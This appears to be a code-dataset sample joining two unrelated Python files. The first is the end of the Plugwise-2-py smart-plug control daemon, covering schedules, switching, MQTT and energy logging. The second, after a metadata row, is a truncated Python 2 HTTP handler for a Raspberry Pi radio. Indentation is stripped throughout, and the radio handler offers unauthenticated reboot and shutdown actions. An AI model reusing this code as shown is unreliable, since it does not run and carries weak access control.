"""apply control settings to circle
in case of a communication problem, c.online is set to False by api
self.test_offline() will apply the control settings again by calling this function
"""
try:
c = self.circles[self.bymac[mac]]
except:
info("mac from controls not found in circles")
return False
if not c.online:
return False
#load new schedule if required
schedname = str(control['schedule'])
#make sure the scheduleCRC read from circle is set
try:
c.get_clock()
except (ValueError, TimeoutException, SerialException) as reason:
error("Error in apply_schedule_to_circle get_clock: %s" % (reason,))
return False
circle_changed = False
if schedname == '':
#no schedule specified.
try:
#only change schedules when schedule_state = off
c.schedule_off()
except (ValueError, TimeoutException, SerialException) as reason:
error("Error in apply_schedule_to_circle schedule_off: %s" % (reason,))
c.undefine_schedule()
if c.scheduleCRC != 17786:
#set always-on schedule in circle
info('circle mac: %s needs schedule to be undefined' % (mac,))
#print('circle mac: %s needs schedule to be undefined' % (mac,))
try:
c.set_schedule_value(-1)
except (ValueError, TimeoutException, SerialException) as reason:
error("Error in apply_schedule_to_circle set always on schedule: %s" % (reason,))
return False
circle_changed = True
else:
try:
sched = self.schedules[self.schedulebyname[schedname]]
if c.schedule is None or schedname != c.schedule.name or sched != c.schedule._watt:
info('circle mac: %s needs schedule to be defined' % (mac,))
#print('circle mac: %s needs schedule to be defined' % (mac,))
#define schedule object for circle
c.define_schedule(schedname, sched, time.localtime().tm_isdst)
#Only upload when mismatch in CRC
debug("apply_control_to_circle: compare CRC's: %d %d" %(c.schedule.CRC, c.scheduleCRC))
if c.schedule.CRC != c.scheduleCRC or c.schedule.dst != time.localtime().tm_isdst:
info('circle mac: %s needs schedule to be uploaded' % (mac,))
try:
c.schedule_off()
c.load_schedule(time.localtime().tm_isdst)
#update scheduleCRC
c.get_clock()
except (ValueError, TimeoutException, SerialException) as reason:
error("Error in apply_control_to_circle load_schedule: %s" % (reason,))
return False
circle_changed = True
except:
error("schedule name from controls '%s' not found in table of schedules" % (schedname,))
return circle_changed
def apply_switch_to_circle(self, control, mac, force=False):
"""apply control settings to circle
in case of a communication problem, c.online is set to False by api
self.test_offline() will apply the control settings again by calling this function
"""
try:
c = self.circles[self.bymac[mac]]
except:
info("mac from controls not found in circles")
return False
if not c.online:
return False
switched = False
#switch on/off if required
sw_state = control['switch_state'].lower()
if sw_state == 'on' or sw_state == 'off':
sw = True if sw_state == 'on' else False
if force or sw_state != c.relay_state or sw_state != c.switch_state:
info('circle mac: %s needs to be switched %s' % (mac, sw_state))
try:
c.switch(sw)
except (ValueError, TimeoutException, SerialException) as reason:
error("Error in apply_control_to_circle failed to switch: %s" % (reason,))
return False
switched = True
else:
error('invalid switch_state value in controls file')
return switched
def apply_schedstate_to_circle(self, control, mac, force=False):
"""apply control settings to circle
in case of a communication problem, c.online is set to False by api
self.test_offline() will apply the control settings again by calling this function
"""
try:
c = self.circles[self.bymac[mac]]
except:
info("mac from controls not found in circles")
return False
if not c.online:
print("offline")
return False
switched = False
#force schedule_state to off when no schedule is defined
if ((not control['schedule']) or control['schedule'] == "") and control['schedule_state'].lower() == 'on':
control['schedule_state'] = 'off'
info('circle mac: %s schedule forced to off because no schedule defined' % (mac,))
self.write_control_file()
self.last_control_ts = os.stat(self.control_fn).st_mtime
#switch schedule on/off if required
sw_state = control['switch_state'].lower()
sw = True if sw_state == 'on' else False
sc_state = control['schedule_state'].lower()
if sc_state == 'on' or sc_state == 'off':
sc = True if sc_state == 'on' else False
if force or sc_state != c.schedule_state:
info('circle mac: %s needs schedule to be switched %s' % (mac, sc_state))
try:
c.schedule_onoff(sc)
if not sc:
#make sure to put switch in proper position when switching off schedule
c.switch(sw)
except (ValueError, TimeoutException, SerialException) as reason:
error("Error in apply_control_to_circle failed to switch schedule: %s" % (reason,))
return False
switched = True
else:
error('invalid schedule_state value in controls file')
return switched
def setup_actfiles(self):
global tmppath
global perpath
global actpre
global actpost
#close all open act files
for m, f in self.actfiles.items():
f.close()
#open actfiles according to (new) config
self.actfiles = dict()
#now = datetime.now()
#local time not following DST (always non-DST)
locnow = datetime.utcnow()-timedelta(seconds=time.timezone)
now = locnow
today = now.date().isoformat()
yrfold = str(now.year)+'/'
if not os.path.exists(tmppath+yrfold+actdir):
os.makedirs(tmppath+yrfold+actdir)
for mac, idx in self.controlsbymac.items():
if self.controls[idx]['monitor'].lower() == 'yes':
fname = tmppath + yrfold + actdir + actpre + today + '-' + mac + actpost
f = open(fname, 'a')
self.actfiles[mac]=f
# def setup_logfiles(self):
# global tmppath
# global perpath
# global logpre
# global logpost
# #name logfiles according to (new) config
# self.logfnames = dict()
# self.daylogfnames = dict()
# #TODO: use locnow
# now = datetime.now()
# today = now.date().isoformat()
# for mac, idx in self.controlsbymac.iteritems():
# if self.controls[idx]['savelog'].lower() == 'yes':
# try:
# if int(self.circles[self.bymac[self.controls[idx]['mac']]].loginterval) <60:
# #daily logfiles - persistent iso tmp
# #fname = tmppath + logdir + logpre + today + '-' + mac + logpost
# fname = perpath + yrfolder + logdir + logpre + today + '-' + mac + logpost
# self.daylogfnames[mac]=fname
# except:
# #assume contineous logging only
# pass
# #contineous log files
# fname = perpath + yrfolder + logdir + logpre + mac + logpost
# self.logfnames[mac]=fname
# #f = open(fname, 'a')
def rsync_to_persistent(self):
global tmppath
global perpath
global actpre
global actpost
global logpre
global logpost
locnow = datetime.utcnow()-timedelta(seconds=time.timezone)
year = locnow.year
if rsyncing:
# /tmp/<year>/pwact-*
tmpfile = tmppath + str(year) + '/' + actdir + actpre + '*' + actpost
cmd = "rsync -aXq " + tmpfile + " " + perpath + str(year) + '/' + actdir
subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
# /tmp/<prev_year>/pwact-*
tmpfile = tmppath + str(year-1) + '/' + actdir + actpre + '*' + actpost
cmd = "rsync -aXq " + tmpfile + " " + perpath + str(year-1) + '/' + actdir
subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
def cleanup_tmp(self):
# tmpfiles = tmppath + actpre + '*' + actpost
# for fn in glob.iglob(tmpfiles):
# if time.time()-os.path.getmtime(fn) > cleanage:
# os.unlink(fn)
tmpfiles = tmppath + '*/' + actdir + actpre + '*' + actpost
for fn in glob.iglob(tmpfiles):
if time.time()-os.path.getmtime(fn) > cleanage:
os.unlink(fn)
def test_mtime(self, before, after):
modified = []
if after:
for (bf,bmod) in list(before.items()):
if (bf in after and after[bf] > bmod):
modified.append(bf)
return modified
def poll_configuration(self):
debug("poll_configuration()")
before = self.schedulesstat
try:
after = dict ((f, os.path.getmtime(f)) for f in glob.glob(schedules_path+'/*.json'))
added = [f for f in list(after.keys()) if not f in list(before.keys())]
removed = [f for f in list(before.keys()) if not f in list(after.keys())]
modified = self.test_mtime(before,after)
if (added or removed or modified):
self.schedules = self.read_schedules()
self.schedulesstat = after
self.apply_schedule_changes()
#TODO: Remove. The schedule is changed, but not the schedule_state is switched on or off!
#for mac, idx in self.controlsbymac.iteritems():
# self.apply_control_to_circle(self.controls[idx], mac, force=True)
except OSError as reason:
error("Error in poll_configuration(): %s" % (reason,))
# if self.last_schedule_ts != os.stat(self.schedule_fn).st_mtime:
# self.last_schedule_ts = os.stat(self.schedule_fn).st_mtime
# self.schedules = self.read_schedules()
# self.apply_schedule_changes()
if self.last_control_ts != os.stat(self.control_fn).st_mtime:
self.last_control_ts = os.stat(self.control_fn).st_mtime
self.read_apply_controls()
self.setup_actfiles()
#self.setup_logfiles()
#failure to apply control settings to a certain circle results
#in offline state for that circle, so it get repaired when the
#self.test_offline() method detects it is back online
#a failure to load a schedule data also results in online = False,
#and recovery is done by the same functions.
def process_mqtt_commands(self):
updated = False
while not qsub.empty():
rcv = qsub.get()
topic = rcv[0]
payl = rcv[1]
info("process_mqtt_commands: %s %s" % (topic, payl))
#topic format: plugwise2py/cmd/<cmdname>/<mac>
st = topic.split('/')
try:
mac = st[-1]
cmd = st[-2]
#msg format: json: {"mac":"...", "cmd":"", "val":""}
msg = json.loads(payl)
control = self.controls[self.controlsbymac[mac]]
val = msg['val']
except:
error("MQTT: Invalid message format in topic or JSON payload")
continue
if cmd == "switch":
val = val.lower()
if val == "on" or val == "off":
control['switch_state'] = val
updated = self.apply_switch_to_circle(control, mac)
#switch command overrides schedule_state setting
control['schedule_state'] = "off"
else:
error("MQTT command has invalid value %s" % (val,))
elif cmd == "schedule":
val = val.lower()
if val == "on" or val == "off":
control['schedule_state'] = val
updated = self.apply_schedstate_to_circle(control, mac)
else:
error("MQTT command has invalid value %s" % (val,))
elif cmd == "setsched":
error("MQTT command not implemented")
elif cmd == "reqstate":
#refresh power readings for circle
try:
c = self.circles[self.bymac[mac]]
c.get_power_usage()
info("Just read power for status update")
except:
info("Error in reading power for status update")
#return message is generic state message below
self.publish_circle_state(mac)
if updated:
self.write_control_file()
self.last_control_ts = os.stat(self.control_fn).st_mtime
def ftopic(self, keyword, mac):
return str("plugwise2py/state/" + keyword +"/" + mac)
def publish_circle_state(self, mac):
qpub.put((self.ftopic("circle", mac), str(self.get_status_json(mac)), True))
def write_control_file(self):
#write control file for testing purposes
fjson = open("config/pw-control.json", 'w')
self.controlsjson['dynamic'] = self.controls
json.dump(self.controlsjson, fjson, indent=4)
fjson.close()
def ten_seconds(self):
"""
Failure to read an actual usage is not treated as a severe error.
The missed values are just not logged. The circle ends up in
online = False, and the self.test_offline() tries to recover
"""
self.curfile.seek(0)
self.curfile.truncate(0)
for mac, f in self.actfiles.items():
try:
c = self.circles[self.bymac[mac]]
except:
error("Error in ten_seconds(): mac from controls not found in circles")
continue
if not c.online:
continue
#prepare for logging values
if epochf:
ts = calendar.timegm(datetime.utcnow().utctimetuple())
else:
t = datetime.time(datetime.utcnow()-timedelta(seconds=time.timezone))
ts = 3600*t.hour+60*t.minute+t.second
try:
_, usage, _, _ = c.get_power_usage()
#print("%10d, %8.2f" % (ts, usage,))
f.write("%5d, %8.2f\n" % (ts, usage,))
self.curfile.write("%s, %.2f\n" % (mac, usage))
#debug("MQTT put value in qpub")
msg = str('{"typ":"pwpower","ts":%d,"mac":"%s","power":%.2f}' % (ts, mac, usage))
qpub.put((self.ftopic("power", mac), msg, True))
except ValueError:
#print("%5d, " % (ts,))
f.write("%5d, \n" % (ts,))
self.curfile.write("%s, \n" % (mac,))
except (TimeoutException, SerialException) as reason:
#for continuous monitoring just retry
error("Error in ten_seconds(): %s" % (reason,))
f.flush()
#prevent backlog in command queue
if mqtt: self.process_mqtt_commands()
self.curfile.flush()
return
# def hourly(self):
# return
def log_recording(self, control, mac):
"""
Failure to read recordings for a circle will prevent writing any new
history data to the log files. Also the counter in the counter file is not
updated. Consequently, at the next call (one hour later) reading the
history is retried.
"""
fileopen = False
if control['savelog'].lower() == 'yes':
info("%s: save log " % (mac,))
try:
c = self.circles[self.bymac[mac]]
except:
error("mac from controls not found in circles")
return
if not c.online:
return
#figure out what already has been logged.
try:
c_info = c.get_info()
#update c.power fields for administrative purposes
c.get_power_usage()
except ValueError:
return
except (TimeoutException, SerialException) as reason:
error("Error in log_recording() get_info: %s" % (reason,))
return
last = c_info['last_logaddr']
first = c.last_log
idx = c.last_log_idx
if c.last_log_ts != 0:
last_dt = datetime.utcfromtimestamp(c.last_log_ts)-timedelta(seconds=time.timezone)
else:
last_dt = None
if last_dt ==None:
debug("start with first %d, last %d, idx %d, last_dt None" % (first, last, idx))
else:
debug("start with first %d, last %d, idx %d, last_dt %s" % (first, last, idx, last_dt.strftime("%Y-%m-%d %H:%M")))
#check for buffer wrap around
#The last log_idx is 6015. 6016 is for the range function
if last < first:
if (first == 6015 and idx == 4) or first >= 6016:
first = 0
else:
#last = 6016
#TODO: correct if needed
last = 6015
log = []
try:
#read one more than request to determine interval of first measurement
#TODO: fix after reading debug log
if last_dt == None:
if first>0:
powlist = c.get_power_usage_history(first-1)
last_dt = powlist[3][0]
#The unexpected case where both consumption and production are logged
#Probably this case does not work at all
if powlist[1][0]==powlist[2][0]:
#not correct for out of sync usage and production buffer
#the returned value will be production only
last_dt=powlist[2][0]
debug("determine last_dt - buffer dts: %s %s %s %s" %
(powlist[0][0].strftime("%Y-%m-%d %H:%M"),
powlist[1][0].strftime("%Y-%m-%d %H:%M"),
powlist[2][0].strftime("%Y-%m-%d %H:%M"),
powlist[3][0].strftime("%Y-%m-%d %H:%M")))
elif first == 0:
powlist = c.get_power_usage_history(0)
if len(powlist) > 2 and powlist[0][0] is not None and powlist[1][0] is not None:
last_dt = powlist[0][0]
#subtract the interval between index 0 and 1
last_dt -= powlist[1][0] - powlist[0][0]
else:
#last_dt cannot be determined yet. wait for 2 hours of recordings. return.
info("log_recording: last_dt cannot be determined. circles did not record data yet.")
return
#loop over log addresses and write to file
for log_idx in range(first, last+1):
buffer = c.get_power_usage_history(log_idx, last_dt)
idx = idx % 4
debug("len buffer: %d, production: %s" % (len(buffer), c.production))
for i, (dt, watt, watt_hour) in enumerate(buffer):
if i >= idx and not dt is None and dt >= last_dt:
#if the timestamp is identical to the previous, add production to usage
#in case of hourly production logging, and end of daylightsaving, duplicate
#timestamps can be present for two subsequent hours. Test the index
#to be odd handles this.
idx = i + 1
if dt == last_dt and c.production == True and i & 1:
tdt, twatt, twatt_hour = log[-1]
twatt+=watt
twatt_hour+=watt_hour
log[-1]=[tdt, twatt, twatt_hour]
else:
log.append([dt, watt, watt_hour])
info("circle buffers: %s %d %s %d %d" % (mac, log_idx, dt.strftime("%Y-%m-%d %H:%M"), watt, watt_hour))
debug("proce with first %d, last %d, idx %d, last_dt %s" % (first, last, idx, last_dt.strftime("%Y-%m-%d %H:%M")))
last_dt = dt
# if idx < 4:
# #not completely read yet.
# last -= 1
# if idx >= 4:
# #not completely read yet.
# last += 1
#idx = idx % 4
# #TODO: buffer is also len=4 for production?
# if len(buffer) == 4 or (len(buffer) == 2 and c.production == True):
# for i, (dt, watt, watt_hour) in enumerate(buffer):
# if not dt is None:
# #if the timestamp is identical to the previous, add production to usage
# #in case of hourly production logging, and end of daylightsaving, duplicate
# #timestamps can be present for two subsequent hours. Test the index
# #to be odd handles this.
# if dt == last_dt and c.production == True and i & 1:
# tdt, twatt, twatt_hour = log[-1]
# twatt+=watt
# twatt_hour+=watt_hour
# log[-1]=[tdt, twatt, twatt_hour]
# else:
# log.append([dt, watt, watt_hour])
# debug("circle buffers: %s %d %s %d %d" % (mac, log_idx, dt.strftime("%Y-%m-%d %H:%M"), watt, watt_hour))
# last_dt = dt
# else:
# last -= 1
except ValueError:
return
#error("Error: Failed to read power usage")
except (TimeoutException, SerialException) as reason:
#TODO: Decide on retry policy
#do nothing means that it is retried after one hour (next call to this function).
error("Error in log_recording() wile reading history buffers - %s" % (reason,))
return
debug("end with first %d, last %d, idx %d, last_dt %s" % (first, last, idx, last_dt.strftime("%Y-%m-%d %H:%M")))
#update last_log outside try block.
#this results in a retry at the next call to log_recording
c.last_log = last
c.last_log_idx = idx
c.last_log_ts = calendar.timegm((last_dt+timedelta(seconds=time.timezone)).utctimetuple())
# if c.loginterval <60:
# dayfname = self.daylogfnames[mac]
# f=open(dayfname,'a')
# else:
# f=open(fname,'a')
#initialisation to a value in the past.
#Value assumes 6016 logadresses = 6016*4 60 minutes logs = 1002.n days
#just set this several years back. Circles may have been unplugged for a while
fileopen = False
f = None
prev_dt = datetime.now()-timedelta(days=2000)
for dt, watt, watt_hour in log:
if not dt is None:
watt = "%15.4f" % (watt,)
watt_hour = "%15.4f" % (watt_hour,)
if epochf:
ts_str = str(calendar.timegm((dt+timedelta(seconds=time.timezone)).utctimetuple()))
else:
ts_str = dt.strftime("%Y-%m-%d %H:%M:%S")
#print("%s, %s, %s" % (ts_str, watt, watt_hour))
#use year folder determined by timestamps in circles
yrfold = str(dt.year)+'/'
if not os.path.exists(perpath+yrfold+actdir):
os.makedirs(perpath+yrfold+actdir)
if not os.path.exists(perpath+yrfold+logdir):
os.makedirs(perpath+yrfold+logdir)
if c.interval <60:
#log in daily file if interval < 60 minutes
if prev_dt.date() != dt.date():
#open new daily log file
if fileopen:
f.close()
ndate = dt.date().isoformat()
# persistent iso tmp
newfname= perpath + yrfold + logdir + logpre + ndate + '-' + mac + logpost
self.daylogfnames[mac]=newfname
f=open(newfname,'a')
else:
#log in the yearly files
if prev_dt.year != dt.year:
if fileopen:
f.close()
newfname= perpath + yrfold + logdir + logpre + mac + logpost
self.logfnames[mac]=newfname
f=open(newfname,'a')
fileopen = True
prev_dt = dt
f.write("%s, %s, %s\n" % (ts_str, watt, watt_hour))
#debug("MQTT put value in qpub")
msg = str('{"typ":"pwenergy","ts":%s,"mac":"%s","power":%s,"energy":%s,"interval":%d}' % (ts_str, mac, watt.strip(), watt_hour.strip(),c.interval))
qpub.put((self.ftopic("energy", mac), msg, True))
if not f == None:
f.close()
if fileopen:
info("circle buffers: %s %s read from %d to %d" % (mac, c.name, first, last))
#store lastlog addresses to file
with open(self.lastlogfname, 'w') as f:
for c in self.circles:
f.write("%s, %d, %d, %d\n" % (c.mac, c.last_log, c.last_log_idx, c.last_log_ts))
return fileopen #if fileopen actual writing to log files took place
# def log_recordings(self):
# debug("log_recordings")
# for mac, idx in self.controlsbymac.iteritems():
# self.log_recording(self.controls[idx], mac)
def test_offline(self):
"""
When an unrecoverable communication failure with a circle occurs, the circle
is set online = False. This function will test on this condition and if offline,
it test whether it is available again, and if so, it will recover
control settings and switching schedule if needed.
In case the circle was offline during initialization, a reinit is performed.
"""
for c in self.circles:
if not c.online:
try:
c.ping()
if c.online:
#back online. Make sure switch and schedule is ok
if not c.initialized:
c.reinit()
self.set_interval_production(c)
idx=self.controlsbymac[c.mac]
self.apply_control_to_circle(self.controls[idx], c.mac)
except ValueError:
continue
except (TimeoutException, SerialException) as reason:
debug("Error in test_offline(): %s" % (reason,))
continue
def reset_all(self):
#NOTE: Untested function, for example purposes
print("Untested function, for example purposes")
print("Aborting. Remove next line to continue")
krak
#
#TODO: Exception handling
for c in self.circles:
if c.name != 'circle+':
print('resetting '+c.name)
c.reset()
for c in self.circles:
if c.name == 'circle+':
print('resetting '+c.name)
c.reset()
print('resetting stick')
self.device.reset()
print('sleeping 60 seconds to allow devices to be reset themselves')
time.sleep(60)
def init_network(self):
#NOTE: Untested function, for example purposes
print("Untested function, for example purposes")
print("Aborting. Remove next line to continue")
krak
#TODO: Exception handling
#
#connect stick and circle+ (=network controller)
#
#First query status. An exception is expected due to an short 0011 response.
#000A/0011
try:
self.device.status()
except:
pass
success = False
for i in range(0,10):
print("Trying to connect to circleplus ...")
#try to locate a circleplus on the network
#0001/0002/0003 request/responses
try:
success = self.device.find_circleplus()
except:
#Not sure whether something should be handled
pass
#try to connect to circleplus on the network
#0004/0005
if success:
try:
self.device.connect_circleplus()
except:
pass
#now unsolicited 0061 FFFD messages may arrive from circleplus
#
#now check for proper (long) status reply
#000A/0011
try:
self.device.status()
#stop the retry loop in case of success
break
except:
success = False
print("sleep 30 seconds for next retry ...")
time.sleep(30)
def connect_node_by_mac(self, newnodemac):
#TODO: Exception handling
#
#the circleplus maintains a table of known nodes
#nodes can be added to this table without ever having been on the network.
# s.join_node('mac', True), where s is the Stick object
#nodes can also be removed from the table with methods:
# cp.remove_node('mac'), where cp is the circleplus object.
#for demonstrative purposes read and print the table
print(self.circles[0].read_node_table())
#Inform network that nodes are allowed to join the network
#Nodes may start advertising themselves with a 0006 message.
self.device.enable_joining(True)
time.sleep(5)
#0006 may be received
#Now add the given mac id to the circleplus node table
self.device.join_node(newnodemac, True)
#now unsolicited 0061 FFFD messages may arrive from node if it was in a resetted state
#
#sleep to allow a resetted node to become operational
time.sleep(60)
#
#test the node, assuming it is already in the configuration files
try:
print(self.circles[self.bymac[newnodemac]].get_info())
except:
print('new node not detected ...')
#
#end the joining process
self.device.enable_joining(False)
#
#Finally read and print the table of nodes again
print(self.circles[0].read_node_table())
def connect_unknown_nodes(self):
for newnodemac in self.device.unjoined:
newnode = None
try:
newnode = self.circles[self.bymac[newnodemac]]
except:
info("connect_unknown_node: not joining node with MAC %s: not in configuration" % (newnodemac,))
#accept or reject join based on occurence in pw-conf.json
self.device.join_node(newnodemac, newnode != None)
#clear the list
self.device.unjoined.clear()
#a later call to self.test_offline will initialize the new circle(s)
#self.test_offline()
def run(self):
global mqtt
locnow = datetime.utcnow()-timedelta(seconds=time.timezone)
now = locnow
day = now.day
hour = now.hour
minute = now.minute
dst = time.localtime().tm_isdst
self.sync_time()
self.dump_status()
#self.log_recordings()
# #SAMPLE: demonstration of connecting 'unknown' nodes
# #First a known node gets removed and reset, and than
# #it is added again by the connect_node_by_mac() method.
# cp=self.circles[0]
# c=self.circles[6]
# try:
# c.reset()
# except:
# pass
# cp.remove_node(c.mac)
# time.sleep(60)
# cp.remove_node(c.mac)
# time.sleep(2)
# try:
# print c.get_info()
# except:
# pass
# self.connect_node_by_mac(c.mac)
# try:
# print c.get_info()
# except:
# pass
circleplus = None
for c in self.circles:
try:
if c.get_info()['type'] == 'circle+':
circleplus = c
except:
pass
if circleplus != None:
debug("joined node table: %s" % (circleplus.read_node_table(),))
#Inform network that nodes are allowed to join the network
#Nodes may start advertising themselves with a 0006 message.
self.device.enable_joining(True)
logrecs = True
while 1:
#check whether user defined configuration has been changed
#when schedules are changed, this call can take over ten seconds!
self.test_offline()
self.poll_configuration()
##align with the next ten seconds.
#time.sleep(10-datetime.now().second%10)
#align to next 10 second boundary, while checking for input commands.
ref = datetime.now()
proceed_at = ref + timedelta(seconds=(10 - ref.second%10), microseconds= -ref.microsecond)
while datetime.now() < proceed_at:
if mqtt: self.process_mqtt_commands()
time.sleep(0.5)
#prepare for logging values
prev_dst = dst
prev_day = day
prev_hour = hour
prev_minute = minute
#now = datetime.now()
#local time not following DST (always non-DST)
locnow = datetime.utcnow()-timedelta(seconds=time.timezone)
now = locnow
dst = time.localtime().tm_isdst
day = now.day
hour = now.hour
minute = now.minute
#read historic data only one circle per minute
if minute != prev_minute:
logrecs = True
#get relays state just after each new quarter hour for circles operating a schedule.
if minute % 15 == 0 and now.second > 8:
self.get_relays()
#add configured unjoined nodes every minute.
#although call is issued every hour
if minute != prev_minute:
self.connect_unknown_nodes()
if day != prev_day:
self.setup_actfiles()
self.ten_seconds()
self.log_status()
if hour != prev_hour:
#self.hourly()
logrecs = True
#self.log_recordings()
self.rsync_to_persistent()
if hour == 4:
self.sync_time()
info("Daily 4 AM: time synced circles.")
#Allow resetted or unknown nodes to join the network every hour
#NOTE: Not fully tested.
try:
self.device.enable_joining(True)
except:
error("PWControl.run(): Communication error in enable_joining")
self.dump_status()
if day != prev_day:
#self.daily()
self.cleanup_tmp()
#Hourly log_recordings. Process one every ten seconds
if logrecs:
breaked = False
for c in self.circles:
idx=self.controlsbymac[c.mac]
if self.log_recording(self.controls[idx], c.mac):
#actual recordings written to logfile
#allow next circle to be logged in next ten seconds.
breaked = True
break
if not breaked:
#all circles have been processed
logrecs = False
#update schedules after change in DST. Update one every ten seconds
for c in self.circles:
if c.online and c.schedule != None and c.schedule.dst != time.localtime().tm_isdst:
info("Circle '%s' schedule shift due to DST changed." % (c.name,))
idx=self.controlsbymac[c.mac]
self.apply_control_to_circle(self.controls[idx], c.mac, force=True)
break
#test
# self.log_recordings()
# self.rsync_to_persistent()
# self.setup_actfiles()
# self.cleanup_tmp()
init_logger(logpath+"pw-logger.log", "pw-logger")
log_level(logging.DEBUG)
log_comm(True)
try:
qpub = queue.Queue()
qsub = queue.Queue()
mqtt_t = None
if not mqtt:
error("No MQTT python binding installed (mosquitto-python)")
elif 'mqtt_ip' in cfg and 'mqtt_port' in cfg:
#connect to server and start worker thread.
if 'mqtt_user' in cfg and 'mqtt_password' in cfg:
mqttclient = Mqtt_client(cfg['mqtt_ip'], cfg['mqtt_port'], qpub, qsub,"Plugwise-2-py",cfg['mqtt_user'],cfg['mqtt_password'])
else:
mqttclient = Mqtt_client(cfg['mqtt_ip'], cfg['mqtt_port'], qpub, qsub, "Plugwise-2-py")
mqttclient.subscribe("plugwise2py/cmd/#")
mqtt_t = threading.Thread(target=mqttclient.run)
mqtt_t.setDaemon(True)
mqtt_t.start()
info("MQTT thread started")
else:
error("No MQTT broker and port configured")
mqtt = False
main=PWControl()
main.run()
except:
close_logcomm()
raise
|
SevenW/Plugwise-2-py
|
devtools/Join-2.py
|
Python
|
gpl-3.0
| 58,244 | 0.009546 |
import SimpleHTTPServer
import sqlite3 as lite
import sys
import urlparse
import datetime
import json
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
class TrackListHandler(BaseHTTPRequestHandler):
def do_OPTIONS(self):
self.send_response(200)
self.send_header('application/json; charset=utf8');
self.send_header('Access-Control-Allow-Origin', '*')
self.send_header('Access-Control-Allow-Methods', 'GET, POST, OPTIONS')
self.send_header("Access-Control-Allow-Headers", "X-Requested-With")
self.send_header("Access-Control-Allow-Headers", "Authorization")
def do_GET(self):
parsedParameters = urlparse.urlparse(self.path)
queryParsed = urlparse.parse_qs(parsedParameters.query)
if( 'type' in queryParsed ):
typeString = queryParsed['type']
if('addTrack' in typeString):
trackUriString = queryParsed['trackUri']
userString = queryParsed['user']
dedicateString = queryParsed['dedicate']
commentsString = queryParsed['comments']
self.addTrack(trackUriString, userString, dedicateString, commentsString)
elif('getTrack' in typeString):
trackUriString = queryParsed['trackUri']
self.getTrack(trackUriString)
elif('getTrackRating' in typeString):
trackUriString = queryParsed['trackUri']
self.getTrackRating(trackUriString)
elif('likeTrack' in typeString):
trackUriString = queryParsed['trackUri']
trackNameString = queryParsed['trackname']
trackArtistString = queryParsed['artist']
trackAlbumString = queryParsed['album']
self.likeTrack(trackUriString, trackNameString, trackArtistString, trackAlbumString)
elif('voteToSkipTrack' in typeString):
trackUriString = queryParsed['trackUri']
trackNameString = queryParsed['trackname']
trackArtistString = queryParsed['artist']
trackAlbumString = queryParsed['album']
self.voteToSkipTrack(trackUriString, trackNameString, trackArtistString, trackAlbumString)
elif('getTrackVotes' in typeString):
trackUriString = queryParsed['trackUri']
self.getTrackVotes(trackUriString)
elif('getTrackVotesAndRating' in typeString):
trackUriString = queryParsed['trackUri']
self.getTrackVotesAndRating(trackUriString)
elif('getTrendingTracks' in typeString):
self.getTrendingTracks()
elif('shutdownPi' in typeString):
self.shutdownPi()
elif('rebootPi' in typeString):
self.rebootPi()
else:
BaseHTTPRequestHandler.SimpleHTTPRequestHandler.do_GET(self);
def getTrack(self, trackUri):
self.send_response(200)
self.send_header("Access-Control-Allow-Headers", "Authorization")
self.send_header('Access-Control-Allow-Origin', '*')
self.send_header('Content-type', 'application/json; charset=utf8')
self.end_headers()
if trackUri[0]:
con = lite.connect('db/radiopi.db')
con.text_factory = str
with con:
cur = con.cursor()
cur.execute("SELECT TrackUri, ChosenBy, DedicatedTo, Comments FROM Tracklist WHERE TrackUri=:TrackUri", {"TrackUri": trackUri[0]})
con.commit()
row = cur.fetchone()
#returnedTrackUri, returnedChosenBy, returnedComments = cur.fetchone()
print row[0], row[1], row[2], row[3]
self.wfile.write('{0}({1})'.format('jsonpGetTrackCallback', {'userString':row[1], 'dedicatedToString':row[2], 'commentString':row[3]}))
self.wfile.close()
def addTrack(self, trackUri, user, dedicate, comments):
self.send_response(200)
self.send_header("Access-Control-Allow-Headers", "Authorization")
self.send_header('Access-Control-Allow-Origin', '*')
self.send_header('Content-type', 'application/json; charset=utf8')
self.end_headers()
if trackUri[0]:
con = lite.connect('db/radiopi.db')
with con:
cur = con.cursor()
cur.execute("insert into Tracklist (TrackUri, ChosenBy, DedicatedTo, Comments, DateAdded) values (?, ?, ?, ?, date('now'))",(trackUri[0], user[0], dedicate[0], comments[0]))
self.wfile.write('{0}({1})'.format('jsonpAddTrackCallback', {'trackUriString':trackUri[0], 'userString':user[0], 'dedicatedToString':dedicate[0],'commentString':comments[0]}))
self.wfile.close()
def likeTrack(self, trackUri, trackname, artist, album):
self.send_response(200)
self.send_header("Access-Control-Allow-Headers", "Authorization")
self.send_header('Access-Control-Allow-Origin', '*')
self.send_header('Content-type', 'application/json; charset=utf8')
self.end_headers()
if trackUri[0]:
con = lite.connect('db/radiopi.db')
with con:
cur = con.cursor()
cur.execute("Select count(*) from UpVote where HostAddress=:HostAddress AND TrackUri=:TrackUri AND DateVoted=date('now')", {"HostAddress": self.client_address[0], "TrackUri": trackUri[0]})
con.commit()
row = cur.fetchone()
print row[0]
if row[0] < 1:
cur.execute("insert into UpVote (TrackUri, DateVoted, HostAddress, TrackName, Artist, Album) values (?, date('now'), ?, ?, ?, ?)",(trackUri[0],self.client_address[0],trackname[0], artist[0], album[0],))
self.wfile.write('{0}({1})'.format('jsonpLikeTrackCallback', {'trackUriString':trackUri[0], 'likeAdded':'true'}))
self.wfile.close()
else:
self.wfile.write('{0}({1})'.format('jsonpLikeTrackCallback', {'trackUriString':trackUri[0], 'likeAdded':'false', 'failedLikeReason':'You may only like a track once'}))
self.wfile.close()
#cur = con.cursor()
#cur.execute("insert into UpVote (TrackUri, DateVoted) values (?, date('now'))",(trackUri[0],))
#self.wfile.write('{0}({1})'.format('jsonpLikeTrackCallback', {'trackUriString':trackUri[0]}))
#self.wfile.close()
def voteToSkipTrack(self, trackUri, trackname, artist, album):
self.send_response(200)
self.send_header("Access-Control-Allow-Headers", "Authorization")
self.send_header('Access-Control-Allow-Origin', '*')
self.send_header('Content-type', 'application/json; charset=utf8')
self.end_headers()
if trackUri[0]:
con = lite.connect('db/radiopi.db')
with con:
today = datetime.datetime.now()
todayStr = "%s-%s-%s" % (today.year, today.month, today.day)
cur = con.cursor()
cur.execute("Select count(*) from votetoskip where HostAddress=:HostAddress AND TrackUri=:TrackUri AND DateVoted=date('now')", {"HostAddress": self.client_address[0], "TrackUri": trackUri[0]})
con.commit()
row = cur.fetchone()
print row[0]
if row[0] < 1:
